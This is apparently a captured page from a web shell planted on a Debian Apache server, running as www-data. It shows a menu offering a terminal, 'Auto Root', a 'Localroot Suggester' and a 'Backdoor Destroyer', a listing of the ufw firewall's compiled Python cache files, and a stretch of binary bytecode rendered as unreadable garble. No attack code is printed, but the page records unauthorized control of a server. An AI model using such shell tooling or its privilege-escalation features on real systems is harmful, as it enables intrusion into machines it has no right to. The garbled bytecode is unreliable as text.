Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
ufw /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-311.pyc
155
B
-rw-r--r--
2025-04-08 17:13
applications.cpython-311.pyc
8.09
KB
-rw-r--r--
2025-04-08 17:13
backend.cpython-311.pyc
32.07
KB
-rw-r--r--
2025-04-08 17:13
backend_iptables.cpython-311.pyc
61.52
KB
-rw-r--r--
2025-04-08 17:13
common.cpython-311.pyc
27.38
KB
-rw-r--r--
2025-04-08 17:13
frontend.cpython-311.pyc
40.69
KB
-rw-r--r--
2025-04-08 17:13
parser.cpython-311.pyc
34.88
KB
-rw-r--r--
2025-04-08 17:13
util.cpython-311.pyc
45.64
KB
-rw-r--r--
2025-04-08 17:13
Save
Rename
� 0fdX � � � d Z ddlZddlZddlZddlmZ dZdZdZeZ dZ dZd Zd Z G d� de� � Z G d � d� � ZdS )z!common.py: common classes for ufw� N)�debug�ufwz/lib/ufwz/usr/share/ufwz/etcz/usrz /usr/sbinTc � � e Zd ZdZd� Zd� ZdS )�UFWErrorz$This class represents ufw exceptionsc � � || _ d S �N)�value)�selfr s �,/usr/lib/python3/dist-packages/ufw/common.py�__init__zUFWError.__init__# s � ��� � � � c �* � t | j � � S r )�reprr �r s r �__str__zUFWError.__str__&